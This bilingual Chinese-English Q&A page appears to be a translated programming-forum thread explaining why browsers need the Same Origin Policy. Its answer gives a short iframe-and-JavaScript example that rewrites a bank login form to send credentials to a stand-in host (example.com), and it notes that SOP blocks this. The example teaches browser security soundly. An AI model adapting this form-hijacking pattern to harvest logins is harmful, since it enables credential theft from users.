为什么需要同源策略的简单示例 [英] Simple example for why Same Origin Policy is needed
问题描述
我已经阅读了 同源策略
,但为了更好地理解这个问题:有人可以写一个简单的代码(用任何语言)来演示 SOP 阻止的攻击吗?
I've read about Same Origin Policy
, but for a better understanding of the matter: could anyone please write a simple code (in any language) that will demonstrate an attack that SOP stops?
在 SOP 出现之前怎么可能攻击别人?
How was it possible to attack someone before SOP came about?
推荐答案
<iframe id="bank" src="https://yourbank.com"></iframe>
<script>
window.onload = function() {
document.getElementById('bank').contentWindow.document.forms[0].action =
'http://example.com';
};
</script>
Javascript 代码更改了表单的操作属性(目的地,顾名思义),因此当您提交表单时,您将凭据发送给我,而不是您的银行.
The Javascript code changes the form's action property (the destination, in a matter of speaking), so when you submit the form, you send your credentials to me, not your bank.
如果我在我的服务器上设置一个 PHP 脚本将您重定向到您的银行,您甚至不会注意到它.
If I set up a PHP script on my server that redirects you to your bank, you won't even notice it.
使用同源策略,这种攻击是不可能的.我域中的站点无法读取或修改银行网站的内容.
With Same Origin Policy, this attack isn't possible. A site on my domain cannot read or modify the contents of the bank's website.
这篇关于为什么需要同源策略的简单示例的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!